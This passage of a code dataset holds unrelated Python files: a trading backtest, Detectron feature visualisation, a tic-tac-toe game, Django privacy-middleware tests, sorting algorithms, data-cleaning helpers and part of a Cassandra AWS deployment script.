info_d['datetime'] = today\n info_d['price'] = price\n info_d['data_dict'] = data_dict\n info_d['dataLen'] = i # 记入数据长度\n\n # 获取开平仓信号\n info_dict = demo.run(info_d)\n # if data[i] > a[i] and self.openFlag == True:\n print('\\n时间挫{} \\n'.format(today))\n\n # 判断是否有删除的挂单\n for d_index in range(len(demo.limit_order_list)):\n if demo.limit_order_list[d_index]['id'] == info_dict['delLimit']:\n del demo.limit_order_list[d_index]\n\n for _index in range(len(demo.limit_order_list)):\n if demo.limit_order_list[_index]['openPrice'] < price and demo.limit_order_list[_index]['side'] == 'buy':\n self.order_open(demo.limit_order_list[_index])\n self.csv_openPrice_dict[demo.limit_order_list[_index]['datetime']] = demo.limit_order_list[_index]['openPrice']\n else:\n self.csv_openPrice_dict[demo.limit_order_list[_index]['datetime']] = ''\n\n if demo.limit_order_list[_index]['closePrice'] > price and demo.limit_order_list[_index]['side'] == 'sell':\n self.csv_closePrice_dict[demo.limit_order_list[_index]['datetime']] = demo.limit_order_list[_index]['closePrice']\n self.order_close(demo.limit_order_list[_index])\n else:\n self.csv_closePrice_dict[demo.limit_order_list[_index]['datetime']] = ''\n\n # 遍历需要交易池\n # 如果是 市价单\n for market_open_order in demo.market_open_order_list:\n if self.openFlag == True:\n self.order_open(market_open_order)\n self.csv_openPrice_dict[market_open_order['datetime']] = price\n self.closeFlag = True\n self.openFlag = False\n else:\n self.csv_openPrice_dict[market_open_order['datetime']] = ''\n\n for market_close_order in demo.market_close_order_list:\n if self.closeFlag == True:\n self.order_close(market_close_order)\n self.csv_closePrice_dict[market_close_order['datetime']] = price\n self.openFlag = True\n self.closeFlag = False\n else:\n self.csv_closePrice_dict[market_close_order['datetime']] = ''\n\n for _k in data_dict.keys():\n self.csv_dataPrice_dict[_k] = data_dict[_k]\n\n\n l_balance = {}\n l_balance = copy.deepcopy(self.balance)\n print('当前余额{}'.format(l_balance))\n self.csv_balance_list.append(l_balance)\n self.csv_time_list.append(today)\n\n self.every_balance.append(l_balance)\n print('every_balance 列表', self.every_balance)\n print('csv_balance_list:', self.csv_balance_list)\n\n self.free_cash_list.append(self.free_cash)\n self.used_cash_list.append(self.used_cash)\n\n print('allowClose_symbol:', self.allowClose_symbol)\n\n # 信号 建仓\n def order_open(self, info_dict):\n print('建仓交易')\n # self.Order(symbol, amount, price)\n order_info = {}\n order_info['symbol'] = info_dict['symbol']\n order_info['amount'] = info_dict['amount']\n order_info['price'] = info_dict['openPrice']\n order_info['type'] = info_dict['type']\n order_info['datetime'] = info_dict['datetime']\n\n self.allowClose_symbol[info_dict['id']] = order_info\n self.trade_date.append(order_info['datetime'])\n self.every_handle_OpenBalance(info_dict)\n pass\n\n # 信号 平仓\n def order_close(self, info_dict):\n print('平仓交易')\n order_info = {}\n order_info['symbol'] = info_dict['symbol']\n order_info['amount'] = info_dict['amount']\n order_info['price'] = info_dict['closePrice']\n order_info['type'] = info_dict['type']\n order_info['datetime'] = info_dict['datetime']\n # self.Order(symbol, amount, price)\n self.trade_date.append(order_info['datetime'])\n self.every_handle_CloseBalance(info_dict)\n\n pass\n\n # 每日处理 建仓单\n def every_handle_OpenBalance(self, info_dict):\n price = float(info_dict['price'])\n amount = float(info_dict['amount'])\n order_amount = price * amount # 需要下单的手数\n\n balance_coin = info_dict['balanceCoin']\n\n if self.free_cash[balance_coin] <= order_amount:\n print('金额不足无法交易, 当前可用金额为{}, 需要交易金额{}'.format(self.free_cash[balance_coin], order_amount))\n pass\n else:\n self.used_cash[balance_coin] += float(amount * price)\n print('占用保证金为{}'.format(self.used_cash[balance_coin]))\n self.free_cash[balance_coin] = self.balance[balance_coin] - self.used_cash[balance_coin]\n self.balance[balance_coin] = self.balance[balance_coin] - float(amount * price)* self.open_fee\n # self.every_balance.append(self.balance)\n print('扣除开仓手续费{}'.format(float(amount * price)* self.open_fee))\n print('下单之后当前可用金额:{}'.format(self.free_cash[balance_coin]))\n\n # 每日处理 平仓单\n def every_handle_CloseBalance(self, info_dict):\n # self.cash = self.cash - float(amount * price)\n price = float(info_dict['price'])\n amount = float(info_dict['amount'])\n order_amount = price * amount # 需要下单的手数\n\n balance_coin = info_dict['balance_coin']\n\n for id in list(self.allowClose_symbol.keys()):\n self.used_cash[balance_coin] -= float(self.allowClose_symbol[id]['price'])\n cash = float(self.allowClose_symbol[id]['amount']) * float(self.allowClose_symbol[id]['price'])*(1 - self.close_fee)\n print('扣除平仓手续后,退还金额:{}'.format(cash))\n # 利润计算\n profit = (float(price) - float(self.allowClose_symbol[id]['price'])) * float(self.allowClose_symbol[id]['amount'])\n print('获得利润为{}'.format(profit))\n self.balance[balance_coin] += profit\n self.free_cash[balance_coin] = self.balance[balance_coin] - self.used_cash[balance_coin]\n\n del self.allowClose_symbol[id]\n\n print('退还后的总余额:{}'.format(self.balance[balance_coin]))\n # self.every_balance.append(self.balance)\n\n # 不下单子时处理 余额\n def every_handle_Balance(self, date_time):\n # self.every_balance.append(self.balance)\n pass\n\n\n\nif __name__ == '__main__':\n # Account().get_history('a', 'a', 'a', 'a')\n # l_data = [1.0, 2.0, 3.0, 4.0, 5.0]\n # a = talib.MA(np.array(l_data), timeperiod=5)\n Account(init_dict).handle_data()\n\n\n\n\n\n\n\n\n\n\n","sub_path":"Account/accountMain_Fund_signal_v3.py","file_name":"accountMain_Fund_signal_v3.py","file_ext":"py","file_size_in_byte":10983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"401836293","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nimport cv2\nimport numpy as np\nimport os\nimport math\n\nfrom caffe2.python import core\nfrom caffe2.python import workspace\n\nfrom detectron.core.config import cfg\nfrom detectron.core.config import get_output_dir\nfrom detectron.utils.io import save_object\n\n\ndef feat_map_draw(im_name, output_dir, feat_map, is_save=True):\n feat_map = np.max(feat_map.copy(), 0)\n\n max_value = np.max(feat_map)\n if max_value > 0:\n # max_value = max_value * 0.1\n # feat_map = np.clip(feat_map, 0, max_value)\n feat_map = feat_map / max_value * 255\n feat_map = feat_map.astype(np.uint8)\n im_color = cv2.applyColorMap(feat_map, cv2.COLORMAP_JET)\n if not is_save:\n return im_color\n file_name = os.path.join(output_dir, im_name + '.png')\n cv2.imwrite(file_name, im_color)\n\n\ndef argmax_feat_map_draw(im_name, output_dir, im, conv5, roi_feat,\n argmax_roi_feat):\n conv5 = feat_map_draw(None, None, conv5.copy(), is_save=False)\n\n max_idx = np.argmax(roi_feat, axis=0)\n\n h, w, _ = conv5.shape\n c, ph, pw = argmax_roi_feat.shape\n ih, iw, _ = im.shape\n\n stride = 1.0 * min(ih, iw) / min(h, w)\n r = 255\n g = 0\n b = 0\n\n thickness = 4\n # thickness = 1\n\n for i in range(ph):\n for j in range(pw):\n c = max_idx[i, j]\n idx = argmax_roi_feat[c, i, j]\n idx_h = int(idx / w)\n idx_w = int(idx % w)\n conv5[idx_h, idx_w, 0] = b\n conv5[idx_h, idx_w, 1] = g\n conv5[idx_h, idx_w, 2] = r\n\n idx_h = max(0, min(int(idx_h * stride), ih - 1))\n idx_w = max(0, min(int(idx_w * stride), iw - 1))\n # im[idx_h, idx_w, 0] = b\n # im[idx_h, idx_w, 1] = g\n # im[idx_h, idx_w, 2] = r\n\n x1 = int(idx_w - stride / 2 * thickness)\n y1 = int(idx_h - stride / 2 * thickness)\n x2 = int(idx_w + stride / 2 * thickness)\n y2 = int(idx_h + stride / 2 * thickness)\n\n cv2.rectangle(im, (x1, y1), (x2, y2), (b, g, r), cv2.FILLED)\n\n file_name = os.path.join(output_dir, im_name + '_im.png')\n cv2.imwrite(file_name, im)\n\n file_name = os.path.join(output_dir, im_name + '_conv5.png')\n cv2.imwrite(file_name, conv5)\n\n\ndef feat_draw(im_name, output_dir, im, conv5, roi_feats, rois,\n argmax_roi_feats):\n\n for i in range(roi_feats.shape[0]):\n roi_feat = roi_feats[i].copy()\n feat_map_draw(im_name + '_' + str(i), output_dir, roi_feat)\n\n argmax_roi_feat = argmax_roi_feats[i].copy()\n argmax_feat_map_draw(im_name + '_argmax_' + str(i), output_dir,\n im.copy(), conv5.copy(), roi_feat.copy(),\n argmax_roi_feat.copy())\n\n feat_map_draw(im_name + '_conv5', output_dir, conv5.copy())\n\n\ndef feat_vis(im, entry, im_name, output_dir):\n\n if cfg.TEST.BBOX_AUG.ENABLED:\n print('test aug is not support')\n exit(0)\n\n if cfg.DEDUP_BOXES > 0:\n print('cfg.DEDUP_BOXES > 0 is not support')\n exit(0)\n\n if not os.path.exists(output_dir):\n os.makedirs(output_dir)\n\n rois = workspace.FetchBlob(core.ScopedName('rois')).squeeze()\n obn_scores = workspace.FetchBlob(core.ScopedName('obn_scores')).squeeze()\n\n # conv5 = workspace.FetchBlob(core.ScopedName('res5_1_sum')).squeeze()\n # conv5 = workspace.FetchBlob(core.ScopedName('res5_2_sum')).squeeze()\n # conv5 = workspace.FetchBlob(core.ScopedName('conv5_3')).squeeze()\n\n roi_feats = workspace.FetchBlob(core.ScopedName('roi_feat')).squeeze()\n fc6 = workspace.FetchBlob(core.ScopedName('fc6')).squeeze()\n fc7 = workspace.FetchBlob(core.ScopedName('fc7')).squeeze()\n\n argmax_roi_feats = workspace.FetchBlob(\n core.ScopedName('_argmax_roi_feat')).squeeze()\n\n # Softmax class probabilities\n scores = workspace.FetchBlob(core.ScopedName('cls_prob')).squeeze()\n # In case there is 1 proposal\n scores = scores.reshape([-1, scores.shape[-1]])\n\n # Select foreground RoIs as those with >= FG_THRESH overlap\n gt_inds = np.where(entry['gt_classes'] > 0)[0]\n\n max_overlaps = entry['max_overlaps']\n\n if np.random.random() < 0.10 or True:\n bg_inds = np.where(max_overlaps < 0.5)[0]\n\n # random bg\n # bg_inds = np.random.choice(bg_inds, 1)\n\n # hard bg\n scores_bg = scores[bg_inds, :]\n gt_classes = entry['gt_classes'][gt_inds]\n gt_classes = np.unique(gt_classes)\n scores_bg = scores_bg[:, gt_classes]\n # scores_bg = np.sum(scores_bg, axis=1)\n bg_inds = bg_inds[scores_bg.argmax(axis=0)]\n\n keep_inds = np.append(gt_inds, bg_inds)\n else:\n keep_inds = gt_inds\n\n rois = rois[keep_inds, ...]\n obn_scores = obn_scores[keep_inds, ...]\n roi_feats = roi_feats[keep_inds, ...]\n argmax_roi_feats = argmax_roi_feats[keep_inds, ...]\n fc6 = fc6[keep_inds, ...]\n fc7 = fc7[keep_inds, ...]\n scores = scores[keep_inds, :]\n\n # max_classes = entry['max_classes'][keep_inds]\n gt_classes = entry['gt_classes'][keep_inds]\n\n # feat_draw(im_name, output_dir, im, conv5, roi_feats, rois,\n # argmax_roi_feats)\n\n save_file = os.path.join(output_dir, im_name + '.pkl')\n print('save to ', save_file)\n save_object(\n dict(\n rois=rois,\n # conv5=conv5,\n roi_feats=roi_feats,\n fc6=fc6,\n fc7=fc7,\n gt_classes=gt_classes,\n ), save_file)\n","sub_path":"detectron/utils/feat_vis.py","file_name":"feat_vis.py","file_ext":"py","file_size_in_byte":5613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"160140019","text":"game = [[\"-\",\"-\",\"-\"],[\"-\",\"-\",\"-\"],[\"-\",\"-\",\"-\"]]\ngame_run = 0\nprint(\"player 1 goes first.\")\nlet = \"x\"\nsum = 0\nfor row in game:\n print(row[0], row[1], row[2])\n\ndsw=0\nwhile game_run < 9:\n c = int(input(\"What column would you like to go to? \"))\n r = int(input(\"What row would you like to go to? \"))\n if game[c][r] == \"-\":\n if sum % 2 == 0:\n let = \"x\"\n else:\n let = \"o\"\n sum = sum + 1\n game[c][r] = let\n print(game)\n game_run = game_run + 1\n for row in game:\n print(row[0], row[1], row[2])\n for l in range (0,3):\n if (game [0][l] == let and game[1][l] == \"x\" and game[2][l] == \"x\") or (game [0][l] == \"o\" and game[1][l] == \"o\" and game[2][l] == \"o\"):\n dsw = 1\n break\n if dsw == 0:\n for k in range(0, 3):\n if (game[k][0] == \"x\" and game[k][1] == \"x\" and game[k][2] == \"x\") or (game[k][0] == \"o\" and game[k][1] == \"o\" and game[k][2] == \"o\"):\n dsw = 1\n break\n if dsw == 0:\n if (game[0][0] == let and game[1][1] == let and game[2][2] == let) or (game[2][0] == let and game[1][1] == let and game[0][2] == let):\n dsw = 1\n\n if dsw == 1:\n game_run = 123456789098765432\n\n else:\n print(\"This space is already occupied.\")\n print(\"Pick a new place to move!\")\n\nif dsw == 1:\n print(\"Player \" + let + \" you win!\")\n","sub_path":"TicTacToe.py","file_name":"TicTacToe.py","file_ext":"py","file_size_in_byte":1482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"369450601","text":"from django.urls import reverse\nfrom django.utils.http import urlencode\n\nfrom workshops.tests.base import TestBase\nfrom workshops.forms import ActionRequiredPrivacyForm\nfrom workshops.models import Person\n\n\nclass TestActionRequiredPrivacy(TestBase):\n def setUp(self):\n super()._setUpAirports()\n super()._setUpBadges()\n self.neville = Person.objects.create(\n personal='Neville', family='Longbottom',\n email='neville@longbottom.com', gender='M', may_contact=True,\n publish_profile=False, airport=self.airport_0_0,\n username='longbottom_neville',\n data_privacy_agreement=False,\n is_active=True,\n )\n self.neville.save()\n\n def test_agreement_already_set(self):\n \"\"\"Make sure the view redirect somewhere if person has already agreed\n to the privacy policy.\"\"\"\n # force login Neville\n self.client.force_login(self.neville)\n\n url = reverse('action_required_privacy')\n\n # form renders\n rv = self.client.get(url)\n self.assertEqual(rv.status_code, 200)\n\n # Neville decided to agree on the privacy policy for this test\n self.neville.data_privacy_agreement = True\n self.neville.save()\n\n # form throws 404\n rv = self.client.get(url)\n self.assertEqual(rv.status_code, 404)\n\n def test_agreement_submit(self):\n \"Make sure the form passes only when `data_agreement_policy` is set.\"\n # setup sample data\n data = {\n 'data_privacy_agreement': False,\n 'may_contact': False,\n 'publish_profile': False,\n }\n\n # make sure it doesn't pass without the privacy policy consent\n form = ActionRequiredPrivacyForm(data, instance=self.neville)\n self.assertFalse(form.is_valid())\n\n # let's try with consent for privacy policy\n data.update({'data_privacy_agreement': True})\n form = ActionRequiredPrivacyForm(data, instance=self.neville)\n self.assertTrue(form.is_valid())\n\n\nclass TestActionRequiredPrivacyMiddleware(TestBase):\n def setUp(self):\n super()._setUpAirports()\n super()._setUpBadges()\n self.neville = Person.objects.create(\n personal='Neville', family='Longbottom',\n email='neville@longbottom.com', gender='M', may_contact=True,\n publish_profile=False, airport=self.airport_0_0,\n username='longbottom_neville',\n data_privacy_agreement=False,\n is_active=True,\n )\n self.neville.save()\n self.form_url = reverse('action_required_privacy')\n\n def test_anonymous_user(self):\n \"\"\"Ensure anonymous user can reach anything.\"\"\"\n urls = [\n reverse('login'),\n reverse('api:root'),\n reverse('training_request'),\n reverse('training_request_confirm'),\n reverse('workshop_request'),\n reverse('workshop_request_confirm'),\n ]\n # ensure we're not logged in\n self.client.logout()\n\n for url in urls:\n rv = self.client.get(url)\n # no redirects!\n self.assertEqual(rv.status_code, 200)\n # user indeed is anonymous\n self.assertEqual(rv.wsgi_request.user.is_anonymous, True)\n\n def test_logged_in_user(self):\n \"\"\"Ensure logged-in user w/o privacy policy agreement is redirected\n to the form.\"\"\"\n urls = [\n reverse('admin-dashboard'),\n reverse('trainee-dashboard'),\n ]\n\n form_url = reverse('action_required_privacy')\n\n # ensure we're logged in\n self.client.force_login(self.neville)\n self.assertEqual(self.neville.data_privacy_agreement, False)\n\n for url in urls:\n rv = self.client.get(url)\n # redirects to the form\n self.assertEqual(rv.status_code, 302)\n self.assertTrue(rv['Location'].startswith(form_url))\n\n def test_no_more_redirects_after_agreement(self):\n \"\"\"Ensure user is no longer forcefully redirected to accept the\n privacy policy.\"\"\"\n url = reverse('trainee-dashboard')\n form_url = reverse('action_required_privacy')\n\n # ensure we're logged in\n self.client.force_login(self.neville)\n self.assertEqual(self.neville.data_privacy_agreement, False)\n\n # we can't get to the url because we're redirected to the form\n rv = self.client.get(url)\n self.assertEqual(rv.status_code, 302)\n self.assertTrue(rv['Location'].startswith(form_url))\n\n # agree on the privacy policy\n self.neville.data_privacy_agreement = True\n self.neville.save()\n\n # now the dashboard is easily reachable\n rv = self.client.get(url)\n self.assertEqual(rv.status_code, 200)\n\n def test_allowed_urls(self):\n form_url = reverse('action_required_privacy')\n urls = [\n reverse('logout'),\n ]\n # ensure we're logged in\n self.client.force_login(self.neville)\n self.assertEqual(self.neville.data_privacy_agreement, False)\n for url in urls:\n rv = self.client.get(url)\n # doesn't redirect to the form\n self.assertIn(rv.status_code, [200, 302])\n if 'Location' in rv:\n self.assertNotEqual(rv['Location'], form_url)\n\n def test_next_param(self):\n \"\"\"Ensure a non-dispatch URL is reachable through `?next` query\n string.\"\"\"\n\n url = reverse('autoupdate_profile')\n form_url = reverse('action_required_privacy')\n form_url += '?{}'.format(urlencode({'next': url}))\n\n # ensure we're logged in\n self.client.force_login(self.neville)\n self.assertEqual(self.neville.data_privacy_agreement, False)\n\n # submit form\n rv = self.client.post(form_url, data=dict(data_privacy_agreement=True))\n self.assertEqual(rv.status_code, 302)\n self.assertEqual(rv['Location'], url)\n","sub_path":"amy/workshops/tests/test_action_required.py","file_name":"test_action_required.py","file_ext":"py","file_size_in_byte":6014,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"476924030","text":"# -*- coding: utf-8 -*-\nimport sys\nsys.path.append('/usr/local/anaconda3/lib/python3.6/site-packages')\nfrom math import sin, cos\ndef mans_kosinuss(x):\n k = 0\n a = (-1)**0*x**1/(1)\n S = a\n print(\"Izdruka no liet.f. a0 = %6.2f S0 = %6.2f\"%(a,S))\n while k < 3:\n k = k + 1\n R = (-1)**x/((2*k)*(2*k+1))\n a = a * R\n S = S + a\n print(\"Izdruka no liet.f. a%d = %6.2f S%d = %6.2f\"%(k,a,k,S))\n \n print(\"Izdruka no liet.f. Beigas!\")\n return S\n\nx = float(input(\"Lietotāj, lūdzu, ievadi argumentu (x): \"))\ny = cos(x)*cos(x)\nprint(\"standarta kos(%.2f) = %6.2f\"%(x,y))\nyy = mans_kosinuss(x)\nprint(\"mans kos(%.2f) = %6.2f\"%(x,yy))\n\n\n","sub_path":"teilora.py","file_name":"teilora.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"166338116","text":"from pickle import dump, load\nimport numpy as np\nimport pandas as pd\nfrom sklearn.preprocessing import StandardScaler\n\n\ndef add_anomalies(df1, df2):\n \"\"\"\n checks current data against pre-existing anomaly labels\n\n df1 : single sensor pandas dataframe\n df2 : single sensor pandas dataframe w/ labels\n \"\"\"\n\n # make sure our date column is in datetime\n # Datetime can be changed to whatever nameing\n # structure we decide on\n df1[\"Datetime\"] = pd.to_datetime(df1[\"Datetime\"])\n df2[\"Datetime\"] = pd.to_datetime(df2[\"Datetime\"])\n\n # labels all main bucket normal\n df1[\"AM\"] = False\n\n # join dataframes adding anomaly columns\n # adds false values to new data\n df2 = df2.combine_first(df1)\n\n # update all machine values where there are human inputs\n cond = ~df2[\"AH\"].isna()\n df2[\"AM\"].loc[cond] = df2[\"AH\"].loc[cond]\n\n return df2\n\n\ndef split_sensors(df1):\n \"\"\"\n seperates dataframe into multiple dataframes\n returns list of dataframes\n\n df1 : single sensor pandas dataframe\n \"\"\"\n\n # seperates single dataframe into multiples with each sensor\n # appends to list\n split_df = pd.DataFrame(df1.groupby(\"uniqueID\"))[1]\n sensor_bucket = {}\n\n # couldn't find a way to vectorize this process\n # dropped and renamed columns to be returned to once InfluxDB is running\n for i in range(0, len(split_df)):\n sensor_bucket[split_df[i][\"uniqueID\"].any()] = (\n split_df[i]\n .reset_index()\n .drop([\"index\", \"result\", \"table\"], axis=1)\n .rename(columns={\"_time\": \"DateTime\", \"_value\": \"Value\", \"uniqueID\": \"ID\"})\n )\n\n return sensor_bucket\n\n\ndef load_loss_percentile(sensor_name, file_path=\"./test_env_loss_percentiles/\"):\n \"\"\"\n loads the percentile for prediction\n to be multiplied with the threshold multiplier\n\n sensor_name : string\n file_path : string\n \"\"\"\n\n file_name = sensor_name + \"_loss_percentile.pkl\"\n\n loss_percentile = load(open(file_path + file_name, \"rb\"))\n\n return loss_percentile\n\n\ndef std_val_train(col1, id, file_path=\"../standardize-parameters/\"):\n \"\"\"\n checks current data against pre-existing anomaly labels\n\n col1 : single sensor pandas int column\n id : string, name of sensor (or sensor group)\n file_path : string\n \"\"\"\n file_name = id + \"_scaler.pkl\"\n # create scaler object\n scale = StandardScaler()\n # apply to pandas column\n st_col1 = scale.fit_transform(col1)\n\n # save scaler parameters\n dump(scale, open(file_path + file_name, \"wb\"))\n\n return st_col1\n\n\ndef std_val_predict(col1, id, file_path=\"../standardize-parameters/\"):\n \"\"\"\n checks current data against pre-existing anomaly labels\n\n col1 : single sensor pandas int column\n id : string, name of sensor (or sensor group)\n file_path : string\n \"\"\"\n file_name = id + \"_scaler.pkl\"\n # create scaler object\n scale = load(open(file_path + file_name, \"rb\"))\n # apply to pandas column\n st_col1 = scale.transform(col1)\n\n return st_col1\n\n\ndef group_check(df1):\n \"\"\"\n checks current data if sensor has been assigned a group\n\n df1 : single sensor pandas dataframe\n \"\"\"\n # load in group lookup csv. Path to be changed\n group_csv = pd.read_csv(\"../../data/testing-data/group_lookup.csv\")\n\n # loop through groups looking for match\n # group length is only 3 for now\n # need not vectorize\n for i in range(0, len(group_csv)):\n if df1[\"ID\"].any() in list(group_csv.iloc[:, i]):\n group = list(group_csv.columns)[i]\n return group\n\n return df1[\"ID\"].any()\n\n\ndef split_normal(df1):\n \"\"\"\n splits normal and abnormal data\n\n df1 : single sensor pandas dataframe\n \"\"\"\n split_df = pd.DataFrame(df1.groupby(\"AM\"))[1]\n\n # returns two dataframes. One of normal data\n # one with abnormal data\n return (\n split_df[0].reset_index().drop(\"index\", axis=1),\n split_df[1].reset_index().drop(\"index\", axis=1),\n )\n\n\ndef model_parser(df1, x_train, y_train, x_eval):\n \"\"\"\n changes columns to\n\n df1 : single sensor pandas dataframe\n x_train : sequenced x data for training\n y_train : sequenced y data for training\n x_train : sequenced x data for evaluating\n \"\"\"\n dict_data = {\n df1[\"ID\"].any(): {\n \"x_train\": x_train,\n \"y_train\": y_train,\n \"x_eval\": x_eval,\n \"y_eval\": \"_\",\n \"train\": df1,\n \"test\": \"_\",\n }\n }\n\n return dict_data\n","sub_path":"code/model/clean.py","file_name":"clean.py","file_ext":"py","file_size_in_byte":4512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"343911661","text":"# A pangram is a sentence that contains every single letter of the alphabet at least once. For example, the sentence \"The quick brown fox jumps over the lazy dog\" is a pangram, because it uses the letters A-Z at least once (case is irrelevant).\n# Given a string, detect whether or not it is a pangram. Return True if it is, False if not. Ignore numbers and punctuation.\n\ndef is_pangram(string):\n alphabet = 'abcdefghijklmnopqrstuvwxyz'\n lstring = string.lower()\n for letter in alphabet:\n if letter not in lstring:\n return False\n return True\n\n# run some tests\nis_pangram(\"The quick, brown fox jumps over the lazy dog!\")\nis_pangram(\"This is some other string.\")","sub_path":"PY/is_pangram.py","file_name":"is_pangram.py","file_ext":"py","file_size_in_byte":689,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"141034997","text":"# Some of sorting algorithms\r\n\r\nmas=[1,6,3,8,5,2,19,43,25,65,76,0,10]\r\n\r\n#___________________________________Stable Sorting Algorithms#___________________________________#\r\n\r\n#Bubble sort O(n^2)\r\ndef bubble_sort(ls):\r\n for i in range(len(ls)):\r\n for j in range(0, i, 1):\r\n if ls[i]=0 and ls[j]>a:\r\n ls[j+1]=ls[j]\r\n j-=1\r\n ls[j+1]=a\r\n return ls \r\n\r\n#Cocktail(Shaker) sort O(n^2)\r\ndef cocktail_sort(ls):\r\n left=0\r\n right=len(ls)-1\r\n while left<=right:\r\n for i in range(left, right, +1):\r\n if ls[i]>ls[i+1]:\r\n temp2=ls[i+1]\r\n ls[i+1]=ls[i]\r\n ls[i]=temp2\r\n right-=1\r\n\r\n for i in range (right, left, -1):\r\n if ls[i-1]>ls[i]:\r\n temp=ls[i-1]\r\n ls[i-1]=ls[i]\r\n ls[i]=temp\r\n left+=1\r\n\r\n return ls\r\n#__________________________________No Stable Sorting Algorithms___________________________________#\r\n\r\n#Selection sort O(n^2)\r\ndef selection_sort(ls):\r\n for i in range(len(ls)-1):\r\n temp=i\r\n for j in range(i+1, len(ls), 1):\r\n if ls[j]pivat): last-=1\r\n if(first<=last):\r\n temp=ls[first]\r\n ls[first]=ls[last]\r\n ls[last]=temp\r\n last-=1\r\n first+=1\r\n if(last>begin):\r\n quick_sort(ls, begin, last)\r\n if(first dict:\n '''\n Allow traffic between regions\n\n Returns a dict of region -> security group ID\n '''\n for region, ips in public_ips.items():\n with Action('Configuring security group in {}..'.format(region)):\n ec2 = boto3.client('ec2', region)\n resp = ec2.describe_vpcs()\n # TODO: support more than one VPC..\n vpc_id = resp['Vpcs'][0]['VpcId']\n sg_name = cluster_name\n sg = ec2.create_security_group(GroupName=sg_name,\n VpcId=vpc_id,\n Description='Allow cassandra nodes to talk via port 7001')\n result[region] = sg\n\n ec2.create_tags(Resources=[sg['GroupId']],\n Tags=[{'Key': 'Name', 'Value': sg_name}])\n ip_permissions = []\n # NOTE: we need to allow ALL public IPs (from all regions)\n for ip in itertools.chain(*public_ips.values()):\n ip_permissions.append({'IpProtocol': 'tcp',\n 'FromPort': 7001, # port range: From-To\n 'ToPort': 7001,\n 'IpRanges': [{'CidrIp': '{}/32'.format(ip['PublicIp'])}]})\n ip_permissions.append({'IpProtocol': '-1',\n 'UserIdGroupPairs': [{'GroupId': sg['GroupId']}]})\n\n # if we can find the Odd security group, authorize SSH access from it\n try:\n resp = ec2.describe_security_groups(GroupNames=['Odd (SSH Bastion Host)'])\n odd_sg = resp['SecurityGroups'][0]\n\n ip_permissions.append({'IpProtocol': 'tcp',\n 'FromPort': 22, # port range: From-To\n 'ToPort': 22,\n 'UserIdGroupPairs': [{'GroupId': odd_sg['GroupId']}]})\n except ClientError:\n pass\n\n ec2.authorize_security_group_ingress(GroupId=sg['GroupId'],\n IpPermissions=ip_permissions)\n\n\ndef find_taupage_amis(regions: list) -> dict:\n '''\n Find latest Taupage AMI for each region\n '''\n result = {}\n for region in regions:\n with Action('Finding latest Taupage AMI in {}..'.format(region)):\n ec2 = boto3.resource('ec2', region)\n filters = [{'Name': 'name', 'Values': ['*Taupage-AMI-*']},\n {'Name': 'is-public', 'Values': ['false']},\n {'Name': 'state', 'Values': ['available']},\n {'Name': 'root-device-type', 'Values': ['ebs']}]\n images = list(ec2.images.filter(Filters=filters))\n if not images:\n raise Exception('No Taupage AMI found')\n most_recent_image = sorted(images, key=lambda i: i.name)[-1]\n result[region] = most_recent_image\n return result\n\n\ndef get_latest_docker_image_version():\n url = 'https://registry.opensource.zalan.do/teams/stups/artifacts/planb-cassandra/tags'\n return requests.get(url).json()[-1]['name']\n\n\npassword_chars = \"{}{}{}\".format(string.ascii_letters, string.digits,\n re.sub(\"[\\\\\\\\'\\\"]\", \"\", string.punctuation))\n\n\ndef generate_password(length: int = 32) -> str:\n return \"\".join(random.choice(password_chars) for x in range(length))\n\n\ndef generate_certificate(cluster_name: str):\n check = call([\"which\", \"keytool\"])\n if check:\n print(\"Keytool is not in searchpath\")\n return\n\n d = tempfile.mkdtemp()\n try:\n keystore = os.path.join(d, 'keystore')\n cmd = [\"keytool\", \"-genkeypair\",\n \"-alias\", \"planb\",\n \"-keyalg\", \"RSA\",\n \"-validity\", \"36000\",\n \"-keystore\", keystore,\n \"-dname\", \"c=DE, st=Berlin, l=Berlin, o=Zalando SE, cn=zalando.net\",\n \"-storepass\", cluster_name,\n \"-keypass\", cluster_name]\n check_call(cmd)\n cert = os.path.join(d, 'cert')\n export = [\"keytool\", \"-export\",\n \"-alias\", \"planb\",\n \"-keystore\", keystore,\n \"-rfc\",\n \"-file\", cert,\n \"-storepass\", cluster_name]\n check_call(export)\n truststore = os.path.join(d, 'truststore')\n importcmd = [\"keytool\", \"-import\",\n \"-noprompt\",\n \"-alias\", \"planb\",\n \"-file\", cert,\n \"-keystore\", truststore,\n \"-storepass\", cluster_name]\n check_call(importcmd)\n\n with open(keystore, 'rb') as fd:\n keystore_data = fd.read()\n with open(truststore, 'rb') as fd:\n truststore_data = fd.read()\n finally:\n pass\n return keystore_data, truststore_data\n\n\ndef allocate_public_ips(regions: list, cluster_size: int, public_ips: dict):\n # reservice Elastic IPs\n for region in regions:\n with Action('Allocating Public IPs for {}..'.format(region)) as act:\n ec2 = boto3.client('ec2', region_name=region)\n for i in range(cluster_size):\n resp = ec2.allocate_address(Domain='vpc')\n public_ips[region].append(resp)\n act.progress()\n\n\ndef get_dmz_subnets(regions: list) -> dict:\n '''\n Returns a dict of lists of DMZ subnets sorted by AZ.\n '''\n subnets = collections.defaultdict(list)\n for region in regions:\n ec2 = boto3.client('ec2', region)\n resp = ec2.describe_subnets()\n\n for subnet in sorted(resp['Subnets'], key=lambda subnet: subnet['AvailabilityZone']):\n for tag in subnet['Tags']:\n if tag['Key'] == 'Name':\n if tag['Value'].startswith('dmz-'):\n subnets[region].append(subnet['SubnetId'])\n return subnets\n\n\n@click.command()\n@click.option('--cluster-size', default=3, type=int, help='number of nodes per region, default: 3')\n@click.option('--instance-type', default='t2.micro', help='default: t2.micro')\n@click.option('--volume-type', default='gp2', help='gp2 (default) | io1 | standard')\n@click.option('--volume-size', default=8, 